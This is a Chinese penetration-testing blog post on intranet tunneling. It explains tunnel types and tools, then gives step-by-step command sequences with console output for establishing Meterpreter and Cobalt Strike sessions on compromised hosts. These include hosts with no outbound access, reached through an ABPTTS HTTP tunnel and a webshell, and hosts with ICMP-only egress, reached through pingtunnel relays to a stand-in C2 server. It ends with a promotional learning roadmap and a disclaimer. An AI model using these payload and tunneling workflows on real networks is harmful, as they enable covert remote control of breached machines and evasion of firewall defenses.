:内网穿透)
一、前言
网络上关于内网穿透的文章很多,但大部分都是侧重于工具的使用,原理提及较少。本文将从内网穿透的原理开始探讨,根据不同的内网出网入网情况,灵活设计对应的内网穿透方案。
二、内网穿透原理
内网穿透是:利用各种隧道技术,以网络防火墙允许的协议,绕过网络防火墙的封锁,实现访问被封锁的目标网络。
什么是隧道技术呢?我们看一下百科词条的解释
隧道技术是一种通过使用互联网络的基础设施在网络之间传递数据的方式。使用隧道传递的数据(或负载)可以是不同协议的数据帧或包。隧道协议将这些其他协议的数据帧或包重新封装在新的包头中发送。新的包头提供了路由信息,从而使封装的负载数据能够通过互联网络传递。被封装的数据包在隧道的两个端点之间通过公共互联网络进行路由。被封装的数据包在公共互联网络上传递时所经过的逻辑路径称为隧道。一旦到达网络终点,数据将被解包并转发到最终目的地。注意隧道技术是指包括数据封装、传输和解包在内的全过程。
我们进行内网渗透常用的隧道技术有dns隧道、http隧道、ssh隧道、icmp隧道等容易被网络防火墙放行的协议。
这些隧道技术可以按所处的协议层分层。
网络层隧道
ICMP隧道等
传输层隧道
TCP隧道、UDP隧道
应用层隧道
HTTP、DNS、SSH等隧道
内网主机所有可能的出网方式
允许ICMP协议出网
网络防火墙允许ICMP协议出网,即能ping通外网主机,一般都能出网
允许特定的TCP或UDP协议端口出网
网络防火墙允许特定的TCP或者UDP端口出网,比如连接外网的22、53、80、443、3389等常见应用的默认监听端口。在一个不能出网的网络环境里面,将所有的TCP和UPD端口都探测一遍,通常都能发现有一两个常见的端口能出网。这通常是由于网络管理员的错误配置和偷懒行为导致。比如配置的防火墙规则前后矛盾,解析的时候遇到匹配规则就退出执行;比如网络管理员配置允许web服务器访问另一子网的mysql数据库的3306端口。网络管理员配置时偷懒,可能会直接放行web服务器到任意ip地址的3306端口
允许特定的应用层协议出网(比如HTTP、SSH、DNS等应用层协议)
这种网络防火墙能识别应用层的协议,放行允许出网的协议,比如HTTP、SSH、DNS、RDP等应用层协议;通常办公网是允许HTTP协议出网的,可能会域名白名单限制
内网主机所有可能的入网方式允许ICMP协议入网
能ping通目标主机
允许特定的TCP或UDP协议端口入网
NAT端口映射公网IP端口到内网主机的服务端口,比如将web服务、mysql服务NAT映射到公网
允许特定的应用层协议入网
这种网络防火墙能识别应用层的协议,放行允许入网的协议。比如HTTP反向代理,将公网收到的HTTP流量反向代理进内网主机。当前主流的入网方式,通常会加层WAF审查入网流量
三、内网穿透常用工具
3.1、网络层隧道工具
icmpsh
能通过ICMP协议反弹cmd,功能单一,反弹回来的cmd极不稳定,不推荐使用
icmptunnel
创建虚拟网卡通过ICMP协议传输网卡流量,基于ICMP隧道的vpn,需要root权限,动静极大,不推荐使用
pingtunnel
tcp、udp、socks5 over ICMP,速度快,连接稳定,跨平台,client模式不需要管理员权限即可正常使用,推荐使用
3.2、传输层隧道工具
netcat
网络工具中的瑞士军刀,不多介绍,linux系统一般自带
powercat
powershell版的netcat
socat
具有记录转发流的功能,方便查看转发内容,需要安装
netsh
windows系统自带的网络配置工具
lcx
端口转发工具
NATBypass
一款lcx在golang下的实现,更好的跨平台,更完善的文档
iox
端口转发 & 内网代理工具,功能类似于lcx/ew,简化了命令行参数,支持UDP流量转发,更好的跨平台。缺点:不支持监听指定IP,默认监听0.0.0.0:port,会增大暴露风险
3.3、应用层隧道工具
由于应用层协议极多,对应的隧道工具也很多,我们常用来做隧道的协议一般是DNS、HTTP、SSH、SOCKS等
dnscat2
不仅可以创建DNS隧道,更是C2
dnscat2-powershell
dnscat2的powershell客户端
dns2tcp
TCP over DNS,即通过DNS隧道转发TCP连接
iodine
IPv4 over DNS,即通过DNS隧道转发IPv4数据包
reGeorg
SOCKS over HTTP,即通过HTTP隧道转发SOCKS
Neo-reGeorg
重构版reGeorg,提高稳定性和可用性,避免特征检测,更新活跃
reDuh
TCP over HTTP,即通过HTTP隧道转发TCP连接,隧道不稳定
Tunna
TCP、SOCKS over HTTP,即通过HTTP隧道转发TCP连接和SOCKS,隧道不稳定
ABPTTS
TCP over HTTP,即通过HTTP隧道转发TCP连接,数据加密,可自定义HTTP数据,对抗特征检测十分优秀,创建的隧道十分稳定,比较遗憾的是支持的web脚本类型只有aspx和jsp
EarthWorm
十分方便的多级SOCKS代理,已经永久停止更新
Termite
EarthWorm的升级版,已经永久停止更新
Venom
Venom是一款为渗透测试人员设计的使用Go开发的多级代理工具。
ssocks
正向和反向的socks工具,可执行文件的大小很小
s5.go
go语言编写的socks服务工具,良好的跨平台特性
ssh
本地转发:```
ssh -CNfg -L 127.0.0.1:7777:114.114.114.114:9999 root@192.168.1.1
#ssh客户端监听127.0.0.1:7777, 将收到的tcp数据包通过连接到192.168.1.1的ssh隧道转发到ssh服务端,再由服务端转发到114.114.114.114:9999远程转发:``` ssh -CNfg -R 127.0.0.1:7777:114.114.114.114:9999 root@192.168.1.1 #ssh服务端监听127.0.0.1:7777, 将收到的tcp数据包通过连接到192.168.1.1的ssh隧道转发到ssh客户端,再由ssh客户端转发到114.114.114.114:9999动态转发:```
ssh -CNfg -D 127.0.0.1:7777 root@192.168.1.1ssh客户端监听127.0.0.1:7777开启socks服务,将收到的socks数据包通过连接到192.168.1.1的ssh隧道转发到ssh服务端,再由ssh服务端转发到目标地址
构建ssh隧道的常用参数:``` -C 压缩传输,提高传输速度 -f 后台执行数据传输 -N 建立静默连接 -g 允许远程主机连接本地用于转发的端口 -L 本地端口转发 -R 远程端口转发 -D 动态转发,即SOCKS代理 -p 指定ssh连接端口
四、实战中的内网穿透案例
4.1、上线零出网的内网主机
实战背景:获取了webshell的主机位于内网,并且该内网主机icmp等网络层协议不能出网,tcp和udp等传输层协议不能出网,dns、http等应用层协议也不能出网,唯一的数据通道是反向代理入网的web应用。
方案设计
利用反向代理入网的web应用所在的HTTP连接,构建正向的TCP over HTTP隧道。通过这条隧道,我们可以向内网主机发起tcp连接。生成bind类型的payload,通过webshell上传执行就会监听一个端口,我们的远控平台通过构建的TCP over HTTP隧道,去连接监听的端口即可上线。
能构建TCP over HTTP的隧道的工具有ABPTTS、Tunna、reDuh等,由于Tunna、reDuh构建的tcp连接不稳定,这里选用ABPTTS。
4.1.1、上线metasploit
1.通过正向的http隧道构建tcp连接
# 配置abptts运行环境 # 注意windows安装pycrypto库需要先安装依赖http://aka.ms/vcpython27 pip install httplib2 pip install pycrypto # 生成server端脚本 python abpttsfactory.py -o server # 上传server端脚本到web服务器,客户端运行以下命令 python abpttsclient.py -c server/config.txt -u "http://192.168.168.10/abptts.aspx" -f 127.0.0.1:7777/127.0.0.1:8888 # abptts客户端监听127.0.0.1:7777,通过http://192.168.168.10/abptts.aspx这个http隧道,将tcp连接127.0.0.1:7777转发到web服务器网络下的127.0.0.1:88882.生成bind类型的payload,通过webshell上传执行
# 这里的rhost和lport是转发的目的IP和端口 msfvenom -p windows/meterpreter/bind_tcp rhost=127.0.0.1 lport=8888 -f exe -o meterpreter.exe3.启动msf监听,等待meterpreter执行上线
#这里的rhost和lport是abptts客户端监听的IP和端口,msf所在主机必须能访问到这个IP和端口,这里msf和abptts在同一个主机上 msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/bind_tcp payload => windows/meterpreter/bind_tcp msf5 exploit(multi/handler) > set rhost 127.0.0.1 rhost => 127.0.0.1 msf5 exploit(multi/handler) > set lport 7777 lport => 7777 msf5 exploit(multi/handler) > run [*] Started bind TCP handler against 127.0.0.1:7777 [*] Sending stage (180291 bytes) to 127.0.0.1 [*] Meterpreter session 1 opened (0.0.0.0:0 -> 127.0.0.1:7777) at 2020-04-27 04:50:25 -0400 meterpreter > getuid Server username: DESKTOP-0AH7FQ0\admin4.1.2、上线cobaltstrike
由于cobaltstrike的bind类型的监听器仅有beacon TCP和beacon SMB,并且都必须连接到父beacon,无法直接连接cobalstrike服务端,所以我们需要一个父beacon来中转连接。
1.通过正向的http隧道构建tcp连接
# 配置abptts运行环境 # 注意windows安装pycrypto库需要先安装依赖http://aka.ms/vcpython27 pip install httplib2 pip install pycrypto # 生成server端脚本 python abpttsfactory.py -o server # 上传server端脚本到web服务器,客户端运行以下命令 python abpttsclient.py -c server/config.txt -u "http://192.168.168.121/abptts.aspx" -f 127.0.0.1:7777/127.0.0.1:8888 # abptts客户端监听127.0.0.1:7777,通过http://192.168.168.121/abptts.aspx这个http隧道,将tcp连接127.0.0.1:7777转发到web服务器网络下的127.0.0.1:88882.创建反向的listener
3.生成父beacon
4.上传父beacon到abptts客户端执行上线
5.创建payload为tcp beacon的listener
6.生成stageless的子beacon
7.将生成的子beacon通过webshell上传执行
# 可以通过webshell查看网络监听,确保子beacon执行成功 netstat -ano | findstr 127.0.0.1:88888.在父beacon中连接abptts的监听ip和端口
9.成功上线不能出网的webshell内网主机
4.2、上线仅icmp协议出网的内网主机
实战背景:通过某种信道获取了内网主机的shell,但是当前信道不适合做远控的通信信道(比如站库分离的网站,我们通过sql注入获取了数据库服务器的shell,但是数据库服务器只有icmp协议可以出网),tcp和udp等传输层协议不能出网,dns、http等应用层协议也不能出网,只有icmp协议可以出网。
方案设计
icmp协议可以出网,可以利用icmp协议,构建反向的TCP over ICMP隧道或者SOCKS over ICMP隧道上线远控平台。搭建隧道的工具使用pingtunnel,它能通过icmp隧道转发tcp、udp、socks5连接。
4.2.1、icmp隧道转发tcp上线metasploit
1.准备好一个具有公网ip的服务器,root权限运行以下命令,启动ICMP隧道服务端
./pingtunnel -type server -noprint 1 -nolog 12.ICMP隧道客户端(即需要通过ICMP隧道上线的主机)执行以下命令即可成功创建反向ICMP隧道
pingtunnel.exe -type client -l 127.0.0.1:9999 -s icmpserver_ip -t c2_server_ip:7777 -tcp 1 -noprint 1 -nolog 1 # 该命令的意思是icmp客户端监听127.0.0.1:9999,通过连接到icmpserver_ip的icmp隧道,将127.0.0.1:9999收到的tcp数据包转发到c2_server_ip:77773.生成反向payload的meterpreter并上传到ICMP隧道客户端执行即可上线
msfvenom -p windows/meterpreter/reverse_https lhost=127.0.0.1 lport=9999 -f exe -o meterpreter.exe # 这里的lhost和lport为icmp客户端监听ip和端口4.启动msf监听,等待meterpreter执行上线
# 这里的lhost和lport为icmp客户端转发到的ip和端口 msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_https payload => windows/meterpreter/reverse_https msf5 exploit(multi/handler) > set lhost 0.0.0.0 lhost => 0.0.0.0 msf5 exploit(multi/handler) > set lport 7777 lport => 7777 msf5 exploit(multi/handler) > run [*] Started HTTPS reverse handler on https://0.0.0.0:7777 meterpreter > getuid Server username: DESKTOP-test0\admin4.2.2、icmp隧道转发socks上线metasploit
1.准备好一个具有公网ip的服务器,root权限运行以下命令,启动ICMP隧道服务端
./pingtunnel -type server -noprint 1 -nolog 12.ICMP隧道客户端(即需要通过ICMP隧道上线的主机)执行以下命令即可成功创建反向ICMP隧道
pingtunnel.exe -type client -l 127.0.0.1:6688 -s icmpserver_ip -sock5 1 -nolog 1 -noprint 1 # 该命令的意思是icmp隧道客户端监听127.0.0.1:6688启动socks5服务,通过连接到icmpserver_ip的icmp隧道,由icmpserver转发socks5代理请求到目的地址3.生成支持socks5代理的反向payload的meterpreter并上传到ICMP隧道客户端执行即可上线
msfvenom -p windows/meterpreter/reverse_https LHOST=c2_server_ip LPORT=8443 HttpProxyType=SOCKS HttpProxyHost=127.0.0.1 HttpProxyPort=6688 -f exe -o meterpreter.exe4.启动msf监听,等待meterpreter执行上线
msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_https payload => windows/meterpreter/reverse_https msf5 exploit(multi/handler) > set lhost 0.0.0.0 lhost => 0.0.0.0 msf5 exploit(multi/handler) > set lport 8443 lport => 8443 msf5 exploit(multi/handler) > run [*] Started HTTPS reverse handler on https://0.0.0.0:8443 meterpreter > getuid Server username: DESKTOP-test0\admin4.2.3、icmp隧道转发tcp上线cobaltstrike
1.准备好一个具有公网ip的服务器,root权限运行以下命令,启动ICMP隧道服务端
./pingtunnel -type server -noprint 1 -nolog 12.ICMP隧道客户端(即需要通过ICMP隧道上线的主机)执行以下命令即可成功创建反向ICMP隧道
pingtunnel.exe -type client -l 127.0.0.1:9999 -s icmpserver_ip -t c2_server_ip:7777 -tcp 1 -noprint 1 -nolog 1 # 该命令的意思是icmp隧道客户端监听127.0.0.1:9999,通过连接到icmpserver_ip的icmp隧道,将127.0.0.1:9999收到的tcp数据包转发到c2_server_ip:77773.cobaltstrike创建listener
# https host和https port(c2)为icmp隧道客户端的监听ip和端口 # https port(bind)为转发目的地址的端口4.生成反向payload的beacon
5.上传生成的beacon到ICMP隧道客户端执行,成功通过反向ICMP隧道上线
4.2.4、icmp隧道转发socks上线cobaltstrike
1.准备好一个具有公网ip的服务器,root权限运行以下命令,启动ICMP隧道服务端
./pingtunnel -type server -noprint 1 -nolog 12.ICMP隧道客户端(即需要通过ICMP隧道上线的主机)执行以下命令即可成功创建反向ICMP隧道
pingtunnel.exe -type client -l 127.0.0.1:6688 -s icmpserver_ip -sock5 1 -nolog 1 -noprint 1 # 该命令的意思是icmp隧道客户端监听127.0.0.1:6688启动socks5服务,通过连接到icmpserver_ip的icmp隧道,由icmpserver转发socks5代理请求到目的地址3.cobaltstrike创建listener
# 这里的代理可以是socks或者http # 好像cobaltstrike不支持socks5代理,这里并不能成功上线 # 这里也可以使用http代理,不过需要工具将http代理转为socks5代理,比如privoxy4.选择创建的listener生成beacon上传到目标执行即可上线
五、总结
内网渗透中内网穿透的本质,无非是通过各种通信信道,无论是正向的还是反向的,实现传输层协议tcp/udp数据包的转发,应用层协议都是基于传输层的协议实现的。比如ABPTTS + SOCKS服务 = reGeorg
**内网渗透中的内网穿透的条件,能通过某种通信信道远程代码执行。如果能通过某种通信信道远程代码执行,一定可以通过这种通信信道实现tcp/udp数据包的转发,即TCP/UDP over something隧道。如果没有现成的工具,可能需要我们自己开发。**比如,通过sql注入获取了shell,我们也可以利用这条通信信道转发tcp/udp数据包,没有现成的工具,需要我们开发工具而已,隧道客户端将tcp/udp数据包封装写进数据库,再由隧道服务端从数据库中读出封装的数据包解包,发往对应地址即可
网络安全学习路线&学习资源![]()
网络安全的知识多而杂,怎么科学合理安排?
下面给大家总结了一套适用于网安零基础的学习路线,应届生和转行人员都适用,学完保底6k!就算你底子差,如果能趁着网安良好的发展势头不断学习,日后跳槽大厂、拿到百万年薪也不是不可能!
初级网工
1、网络安全理论知识(2天)
①了解行业相关背景,前景,确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。(非常重要)
2、渗透测试基础(一周)
①渗透测试的流程、分类、标准
②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察
④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等
3、操作系统基础(一周)
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全(系统入侵排查/系统加固基础)
4、计算机网络基础(一周)
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析(HTTP、TCP/IP、ARP等)
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现
5、数据库基础操作(2天)
①数据库基础
②SQL语言基础
③数据库安全加固
6、Web渗透(1周)
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)
恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;如果等保模块学的好,还可以从事等保工程师。薪资区间6k-15k
到此为止,大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗?
【“脚本小子”成长进阶资源领取】
7、脚本编程(初级/中级/高级)
在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中,想要高效地使用自制的脚本工具来实现各种目的,更是需要拥有编程能力.
零基础入门,建议选择脚本语言Python/PHP/Go/Java中的一种,对常用库进行编程学习; 搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP, IDE强烈推荐Sublime; ·Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完; ·用Python编写漏洞的exp,然后写一个简单的网络爬虫; ·PHP基本语法学习并书写一个简单的博客系统; 熟悉MVC架构,并试着学习一个PHP框架或者Python框架 (可选); ·了解Bootstrap的布局或者CSS。
8、超级网工
这部分内容对零基础的同学来说还比较遥远,就不展开细说了,贴一个大概的路线。感兴趣的童鞋可以研究一下,不懂得地方可以【点这里】加我耗油,跟我学习交流一下。
网络安全工程师企业级学习路线
如图片过大被平台压缩导致看不清的话,可以【点这里】加我耗油发给你,大家也可以一起学习交流一下。
一些我自己买的、其他平台白嫖不到的视频教程:
需要的话可以扫描下方卡片加我耗油发给你(都是无偿分享的),大家也可以一起学习交流一下。
网络安全学习路线&学习资源![]()
结语
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
特别声明:
此教程为纯技术分享!本书的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本书的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失!!!
